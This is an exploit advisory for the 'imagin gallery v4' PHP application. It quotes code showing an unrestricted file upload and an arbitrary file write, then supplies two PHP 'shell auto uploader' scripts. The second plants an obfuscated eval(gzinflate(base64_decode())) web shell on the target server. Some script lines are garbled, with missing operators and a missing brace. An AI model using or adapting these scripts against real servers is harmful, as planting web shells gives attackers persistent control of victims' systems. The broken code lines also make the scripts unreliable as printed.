
imagin gallery v4 multi-vulnerability

Author: xev!l-dz , Published: 07-02-2014
# Exploit Title: imagin gallery  v4 multi-vulnerability
# Date: 01/01/2014
# Exploit Author: xev!l-dz
# Vendor Homepage: http://imagin.ro
# Software Link: http://imagin.ro/downloads/imaginV4.alpha.zip
# Version: v4 alpha
# Tested on: [windows 7 and kali linux]
# Disclaimer : all the information in this document is provided "as is", for educational purposes only. The authors will not be responsible for any damage.
---------------------------------------------------------------------------------------
REMOTE UPLOAD (unrestricted file upload):
vulnerable file: path/files.imagin/API/filesystem/uploadFile.php
affected code (the destination directory and the final filename are taken directly from the `path` and `name` POST fields, and the only check applied to the uploaded file is its size, not its type or location):
/////////////////////////////////////////////////////////////////////////////////////////////////
12 $path = "../../".$_POST["path"];//with slash at the end
13 $name = $_POST["name"];
19 if ($_FILES['Filedata']['size'] < $MAXIMUM_FILESIZE) {
20 // upload the file
21 move_uploaded_file($_FILES['Filedata']['tmp_name'], $path.$_FILES['Filedata']['name'])
22 or die ("error::Can't upload");
23
24 // move and resize
25 rename($path.$_FILES['Filedata']['name'], $path.$name)
26 or die("error::You don't have permissions to access the folder");
//////////////////////////////////////////////////////////////////////////////////////////////////
ARBITRARY FILE WRITE:
vulnerable file: path/files.imagin/API/filesystem/saveToServer.php
affected code (the raw POST body is written to whatever filename the `name` query parameter supplies, with no visible authentication, path or extension check):
//////////////////////////////////////////////////////////////////////////////////////////////////
2 if ( isset ( $GLOBALS["HTTP_RAW_POST_DATA"] )) {
3
4 $im = $GLOBALS["HTTP_RAW_POST_DATA"];
5
6 $fp = fopen($_GET['name'], 'wb');
7 echo fwrite($fp, $im);
8 fclose($fp);
//////////////////////////////////////////////////////////////////////////////////////////////////
- The same pattern is present in other files in the filesystem directory.
I already made a shell auto uploader for them:
//////////////////////////////////////////////////////////////////////////////////////////////////
for the first one (uploadFile.php)
//////////////////////////////////////////////////////////////////////////////////////////////////
<?php
if(!isset($argv[4])){
print 
"
[*]-----------------------------------------------------------------------[*]
[+] Script Name          : imagin auto uploader 
[+] Version              : 0.1
[+] Programed By         : xevil-dz (algerian pentester)
[+] Email                : rrx0xrr@gmail.com
[*]-----------------------------------------------------------------------[*]
usage: php 
$argv[0] http://127.0.0.1/path/ shell.php /dz/ dz.php
"
;
}
else{
$ch curl_init($argv[1].'/files.imagin/API/filesystem/uploadFile.php');
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,array('Filedata'=>"$argv[2]",'path'=>"$argv[3]",'name'=>"$argv[4]"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
if(
$postResult){
print
"
[*]-----------------------------------------------------------------------[*]
[+] your shell was uploaded sucssfuly !!!
[+] u can find ur shell her
[+] 
$argv[1]/files.imagin/$argv[3]/dz.php
[*]-----------------------------------------------------------------------[*]"
;}
else{
print 
"
[-]ERROR: shell not uploaded unknown error[-]"
;
}
}
?>

//////////////////////////////////////////////////////////////////////////////////////////////////////
for the second one (saveToServer.php)
//////////////////////////////////////////////////////////////////////////////////////////////////////
<?php
if(!isset($argv[1])){
print 
"
[*]-----------------------------------------------------------------------[*]
[+] Script Name          : imagin v4 auto uploader
[+] Version              : 0.1
[+] Programed By         : xevil-dz    (algerian pentester)
[+] Email                : rrx0xrr@gmail.com
[*]-----------------------------------------------------------------------[*]
usage:php 
$argv[0] http://127.0.0.1/path/
"
;

else{
$shell='<?php eval(gzinflate(base64_decode(\'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\')));?> 
';
$ch = curl_init($argv[1].'/files.imagin/API/filesystem/saveToServer.php?name=dz.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
if($postResult){
if (preg_match("#error#",$postResult)){
print "
[-]ERROR: shell not uploaded unknown error[-]";
}
else{
print"
[*]-----------------------------------------------------------------------[*]
[+] your shell was uploaded sucssfuly !!!
[+] u can find ur shell her
[+] $argv[1]/files.imagin/API/filesystem/dz.php
[*]-----------------------------------------------------------------------[*]";}
}}
?>
//////////////////////////////////////////////////////////////////////////////////////////////////////
greetz ::::to all algerians pentesters 2014 -_-
